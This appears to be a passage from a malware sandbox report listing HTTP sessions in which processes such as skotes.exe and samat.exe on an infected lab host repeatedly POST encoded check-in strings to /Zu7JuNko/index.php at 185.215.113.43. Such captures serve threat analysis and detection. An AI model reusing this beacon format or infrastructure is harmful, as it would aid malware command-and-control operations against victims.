Nov 21, 2024 22:16:25.159796953 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49831	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:26.788206100 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:28.180253029 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49832	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:29.928020954 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:31.362492085 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49833	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:32.991607904 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:34.377887964 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50106	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:39.148222923 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:40.484082937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50107	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:42.225697041 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:43.659493923 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50109	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:48.460131884 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:49.800642967 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50111	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:51.431898117 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:52.872534037 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50113	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:57.635389090 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:59.069242001 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50115	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:03.805797100 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:05.169961929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50116	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:06.913929939 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:08.315731049 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50118	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:13.274408102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:14.608871937 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50120	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:19.381968975 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:20.758619070 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50122	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:25.523941994 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:26.969540119 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50123	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:28.600280046 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:29.992561102 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50125	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:34.743125916 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:36.089310884 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50127	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:40.883635044 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:42.264595985 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50128	185.215.113.43	80	3952	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:43.990989923 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:45.368248940 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.5	50129	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:47.006912947 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:48.403599977 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.5	50130	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:50.148983002 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:51.555434942 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.5	50131	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:53.194601059 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:54.578217030 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	50134	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:56.321894884 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:57.699136972 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50136	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:17:59.335553885 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:00.772962093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50137	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:02.521106005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:03.948764086 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	50138	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
